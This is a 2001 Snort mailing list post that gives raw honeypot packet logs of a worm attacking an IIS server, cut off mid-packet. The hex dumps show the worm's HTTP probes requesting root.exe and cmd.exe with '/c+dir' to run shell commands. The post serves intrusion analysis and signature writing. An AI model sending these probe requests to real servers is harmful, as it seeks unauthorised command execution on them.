Snort mailing list archives
Packet logs of Concept V.5 infection
From: Steve Halligan <agent33 () geeksquad com>
Date: Tue, 18 Sep 2001 11:12:11 -0500
Here is a packet by packet replay of my honeypot getting infected. I have the admin.dll file if anyone wants to looks at it. -Steve ---------------------------------------------------------------------------- -- #(2 - 24924) [2001-09-18 10:04:05] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=26648 flags=0 offset=0 TTL=118 chksum=60286 TCP: port=4493 -> dport: 80 flags=******S* seq=406394821 ack=0 off=6 res=0 win=8192 urp=0 chksum=34070 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25166) [2001-09-18 10:17:12] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=39313 flags=0 offset=0 TTL=118 chksum=47621 TCP: port=3276 -> dport: 80 flags=******S* seq=460999518 ack=0 off=6 res=0 win=8192 urp=0 chksum=21245 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25167) [2001-09-18 10:17:12] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=51456 flags=0 offset=0 TTL=128 chksum=32918 TCP: port=80 -> dport: 3276 flags=***A**S* seq=285290 ack=460999519 off=6 res=0 win=8760 urp=0 chksum=63045 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25168) [2001-09-18 10:17:13] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=22418 flags=0 offset=0 TTL=119 chksum=64264 TCP: port=3276 -> dport: 80 flags=***A**** seq=460999519 ack=285291 off=5 res=0 win=8760 urp=0 chksum=3587 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25169) [2001-09-18 10:17:13] WEB-IIS CodeRed v2 root.exe access IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=112 ID=22674 flags=0 offset=0 TTL=119 chksum=63936 TCP: port=3276 -> dport: 80 flags=***AP*** seq=460999519 ack=285291 off=5 res=0 win=8760 urp=0 chksum=12511 Payload: length = 72 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F GET /scripts/roo 010 : 74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 t.exe?/c+dir HTT 020 : 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 P/1.0..Host: www 030 : 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 ..Connnection: c 040 : 6C 6F 73 65 0D 0A 0D 0A lose.... ---------------------------------------------------------------------------- -- #(2 - 25170) [2001-09-18 10:17:13] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=644 ID=51712 flags=0 offset=0 TTL=128 chksum=32062 TCP: port=80 -> dport: 3276 flags=***AP*** seq=285291 ack=460999591 off=5 res=0 win=8688 urp=0 chksum=50754 Payload: length = 604 000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A HTTP/1.1 404 Obj 010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53 ect Not Found..S 020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 erver: Microsoft 030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 -IIS/4.0..Date: 040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31 Tue, 18 Sep 2001 050 : 20 31 36 3A 30 30 3A 35 33 20 47 4D 54 0D 0A 43 16:00:53 GMT..C 060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 ontent-Length: 4 070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 61..Content-Type 080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C : text/html....< 090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C html><head><titl 0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74 e>Error 404</tit 0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D le>....<meta nam 0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65 e="robots" conte 0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C nt="noindex">..< 0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D META HTTP-EQUIV= 0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43 "Content-Type" C 100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D ONTENT="text/htm 110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38 l; charset=iso-8 120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A 859-1"></head>.. 130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E ..<body>....<h2> 140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F HTTP Error 404</ 150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E h2>....<p><stron 160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C g>404 Not Found< 170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A /strong></p>.... 180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65 <p>The Web serve 190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68 r cannot find th 1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74 e file or script 1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20 you asked for. 1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65 Please check the 1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74 URL to ensure t 1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20 hat the path is 1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A correct.</p>.... 200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63 <p>Please contac 210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61 t the server's a 220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20 dministrator if 230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72 this problem per 240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F sists.</p>....</ 250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E body></html> ---------------------------------------------------------------------------- -- #(2 - 25171) [2001-09-18 10:17:13] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=51968 flags=0 offset=0 TTL=128 chksum=32410 TCP: port=80 -> dport: 3276 flags=***A***F seq=285895 ack=460999591 off=5 res=0 win=8688 urp=0 chksum=2982 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25172) [2001-09-18 10:17:13] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=30354 flags=0 offset=0 TTL=118 chksum=56584 TCP: port=3276 -> dport: 80 flags=*****R** seq=460999591 ack=0 off=5 res=0 win=0 urp=0 chksum=35438 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25173) [2001-09-18 10:17:13] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=30610 flags=0 offset=0 TTL=118 chksum=56324 TCP: port=3555 -> dport: 80 flags=******S* seq=461002231 ack=0 off=6 res=0 win=8192 urp=0 chksum=18253 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25174) [2001-09-18 10:17:13] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=52224 flags=0 offset=0 TTL=128 chksum=32150 TCP: port=80 -> dport: 3555 flags=***A**S* seq=285921 ack=461002232 off=6 res=0 win=8760 urp=0 chksum=59422 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25175) [2001-09-18 10:17:13] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=30866 flags=0 offset=0 TTL=118 chksum=6921 TCP: port=3276 -> dport: 80 flags=*****R** seq=460999591 ack=460999591 off=5 res=0 win=0 urp=0 chksum=9037 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25176) [2001-09-18 10:17:13] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=39058 flags=0 offset=0 TTL=119 chksum=47624 TCP: port=3555 -> dport: 80 flags=***A**** seq=461002232 ack=285922 off=5 res=0 win=8760 urp=0 chksum=65499 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25177) [2001-09-18 10:17:13] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=110 ID=39314 flags=0 offset=0 TTL=119 chksum=47298 TCP: port=3555 -> dport: 80 flags=***AP*** seq=461002232 ack=285922 off=5 res=0 win=8760 urp=0 chksum=52401 Payload: length = 70 000 : 47 45 54 20 2F 4D 53 41 44 43 2F 72 6F 6F 74 2E GET /MSADC/root. 010 : 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F exe?/c+dir HTTP/ 020 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 1.0..Host: www.. 030 : 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F Connnection: clo 040 : 73 65 0D 0A 0D 0A se.... ---------------------------------------------------------------------------- -- #(2 - 25178) [2001-09-18 10:17:13] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=644 ID=52736 flags=0 offset=0 TTL=128 chksum=31038 TCP: port=80 -> dport: 3555 flags=***AP*** seq=285922 ack=461002302 off=5 res=0 win=8690 urp=0 chksum=46875 Payload: length = 604 000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A HTTP/1.1 404 Obj 010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53 ect Not Found..S 020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 erver: Microsoft 030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 -IIS/4.0..Date: 040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31 Tue, 18 Sep 2001 050 : 20 31 36 3A 30 30 3A 35 34 20 47 4D 54 0D 0A 43 16:00:54 GMT..C 060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 ontent-Length: 4 070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 61..Content-Type 080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C : text/html....< 090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C html><head><titl 0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74 e>Error 404</tit 0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D le>....<meta nam 0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65 e="robots" conte 0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C nt="noindex">..< 0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D META HTTP-EQUIV= 0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43 "Content-Type" C 100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D ONTENT="text/htm 110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38 l; charset=iso-8 120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A 859-1"></head>.. 130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E ..<body>....<h2> 140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F HTTP Error 404</ 150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E h2>....<p><stron 160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C g>404 Not Found< 170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A /strong></p>.... 180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65 <p>The Web serve 190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68 r cannot find th 1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74 e file or script 1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20 you asked for. 1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65 Please check the 1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74 URL to ensure t 1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20 hat the path is 1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A correct.</p>.... 200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63 <p>Please contac 210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61 t the server's a 220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20 dministrator if 230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72 this problem per 240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F sists.</p>....</ 250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E body></html> ---------------------------------------------------------------------------- -- #(2 - 25179) [2001-09-18 10:17:13] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=52992 flags=0 offset=0 TTL=128 chksum=31386 TCP: port=80 -> dport: 3555 flags=***A***F seq=286526 ack=461002302 off=5 res=0 win=8690 urp=0 chksum=64894 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25180) [2001-09-18 10:17:13] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=48018 flags=0 offset=0 TTL=118 chksum=38920 TCP: port=3555 -> dport: 80 flags=*****R** seq=461002302 ack=4011519 off=5 res=0 win=0 urp=0 chksum=18564 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25181) [2001-09-18 10:17:13] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=48274 flags=0 offset=0 TTL=118 chksum=38660 TCP: port=3585 -> dport: 80 flags=******S* seq=461002481 ack=0 off=6 res=0 win=8192 urp=0 chksum=17973 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25182) [2001-09-18 10:17:13] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=53248 flags=0 offset=0 TTL=128 chksum=31126 TCP: port=80 -> dport: 3585 flags=***A**S* seq=286441 ack=461002482 off=6 res=0 win=8760 urp=0 chksum=58622 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25183) [2001-09-18 10:17:13] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=48786 flags=0 offset=0 TTL=118 chksum=54536 TCP: port=3555 -> dport: 80 flags=*****R** seq=461002302 ack=461002302 off=5 res=0 win=0 urp=0 chksum=3336 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25184) [2001-09-18 10:17:14] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=62610 flags=0 offset=0 TTL=119 chksum=24072 TCP: port=3585 -> dport: 80 flags=***A**** seq=461002482 ack=286442 off=5 res=0 win=8760 urp=0 chksum=64699 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25185) [2001-09-18 10:17:14] WEB-IIS cmd.exe access IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=120 ID=62866 flags=0 offset=0 TTL=119 chksum=23736 TCP: port=3585 -> dport: 80 flags=***AP*** seq=461002482 ack=286442 off=5 res=0 win=8760 urp=0 chksum=59489 Payload: length = 80 000 : 47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73 GET /c/winnt/sys 010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c 020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H 030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne 040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close.... ---------------------------------------------------------------------------- -- #(2 - 25186) [2001-09-18 10:17:14] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=644 ID=53504 flags=0 offset=0 TTL=128 chksum=30270 TCP: port=80 -> dport: 3585 flags=***AP*** seq=286442 ack=461002562 off=5 res=0 win=8680 urp=0 chksum=46075 Payload: length = 604 000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A HTTP/1.1 404 Obj 010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53 ect Not Found..S 020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 erver: Microsoft 030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 -IIS/4.0..Date: 040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31 Tue, 18 Sep 2001 050 : 20 31 36 3A 30 30 3A 35 34 20 47 4D 54 0D 0A 43 16:00:54 GMT..C 060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 ontent-Length: 4 070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 61..Content-Type 080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C : text/html....< 090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C html><head><titl 0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74 e>Error 404</tit 0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D le>....<meta nam 0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65 e="robots" conte 0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C nt="noindex">..< 0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D META HTTP-EQUIV= 0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43 "Content-Type" C 100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D ONTENT="text/htm 110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38 l; charset=iso-8 120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A 859-1"></head>.. 130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E ..<body>....<h2> 140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F HTTP Error 404</ 150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E h2>....<p><stron 160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C g>404 Not Found< 170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A /strong></p>.... 180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65 <p>The Web serve 190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68 r cannot find th 1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74 e file or script 1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20 you asked for. 1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65 Please check the 1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74 URL to ensure t 1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20 hat the path is 1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A correct.</p>.... 200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63 <p>Please contac 210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61 t the server's a 220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20 dministrator if 230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72 this problem per 240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F sists.</p>....</ 250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E body></html> ---------------------------------------------------------------------------- -- #(2 - 25187) [2001-09-18 10:17:14] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=53760 flags=0 offset=0 TTL=128 chksum=30618 TCP: port=80 -> dport: 3585 flags=***A***F seq=287046 ack=461002562 off=5 res=0 win=8680 urp=0 chksum=64094 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25188) [2001-09-18 10:17:14] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=51859 flags=0 offset=0 TTL=118 chksum=35075 TCP: port=3785 -> dport: 80 flags=******S* seq=461004445 ack=0 off=6 res=0 win=8192 urp=0 chksum=15809 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25189) [2001-09-18 10:17:14] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=54016 flags=0 offset=0 TTL=128 chksum=30358 TCP: port=80 -> dport: 3785 flags=***A**S* seq=287413 ack=461004446 off=6 res=0 win=8760 urp=0 chksum=55486 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25192) [2001-09-18 10:17:15] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=19860 flags=0 offset=0 TTL=119 chksum=1287 TCP: port=3785 -> dport: 80 flags=***A**** seq=461004446 ack=287414 off=5 res=0 win=8760 urp=0 chksum=61563 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25193) [2001-09-18 10:17:15] WEB-IIS cmd.exe access IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=120 ID=20116 flags=0 offset=0 TTL=119 chksum=951 TCP: port=3785 -> dport: 80 flags=***AP*** seq=461004446 ack=287414 off=5 res=0 win=8760 urp=0 chksum=56352 Payload: length = 80 000 : 47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73 GET /d/winnt/sys 010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c 020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H 030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne 040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close.... ---------------------------------------------------------------------------- -- #(2 - 25194) [2001-09-18 10:17:15] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=644 ID=54528 flags=0 offset=0 TTL=128 chksum=29246 TCP: port=80 -> dport: 3785 flags=***AP*** seq=287414 ack=461004526 off=5 res=0 win=8680 urp=0 chksum=42683 Payload: length = 604 000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A HTTP/1.1 404 Obj 010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53 ect Not Found..S 020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 erver: Microsoft 030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 -IIS/4.0..Date: 040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31 Tue, 18 Sep 2001 050 : 20 31 36 3A 30 30 3A 35 35 20 47 4D 54 0D 0A 43 16:00:55 GMT..C 060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 ontent-Length: 4 070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 61..Content-Type 080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C : text/html....< 090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C html><head><titl 0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74 e>Error 404</tit 0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D le>....<meta nam 0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65 e="robots" conte 0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C nt="noindex">..< 0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D META HTTP-EQUIV= 0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43 "Content-Type" C 100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D ONTENT="text/htm 110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38 l; charset=iso-8 120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A 859-1"></head>.. 130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E ..<body>....<h2> 140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F HTTP Error 404</ 150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E h2>....<p><stron 160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C g>404 Not Found< 170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A /strong></p>.... 180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65 <p>The Web serve 190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68 r cannot find th 1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74 e file or script 1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20 you asked for. 1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65 Please check the 1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74 URL to ensure t 1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20 hat the path is 1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A correct.</p>.... 200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63 <p>Please contac 210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61 t the server's a 220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20 dministrator if 230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72 this problem per 240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F sists.</p>....</ 250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E body></html> ---------------------------------------------------------------------------- -- #(2 - 25195) [2001-09-18 10:17:15] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=54784 flags=0 offset=0 TTL=128 chksum=29594 TCP: port=80 -> dport: 3785 flags=***A***F seq=288018 ack=461004526 off=5 res=0 win=8680 urp=0 chksum=60958 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25196) [2001-09-18 10:17:15] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=26260 flags=0 offset=0 TTL=118 chksum=60678 TCP: port=3785 -> dport: 80 flags=*****R** seq=461004526 ack=2073600184 off=5 res=0 win=0 urp=0 chksum=22745 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25197) [2001-09-18 10:17:15] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=26516 flags=0 offset=0 TTL=118 chksum=60418 TCP: port=3888 -> dport: 80 flags=******S* seq=461005598 ack=0 off=6 res=0 win=8192 urp=0 chksum=14553 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25198) [2001-09-18 10:17:15] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=55040 flags=0 offset=0 TTL=128 chksum=29334 TCP: 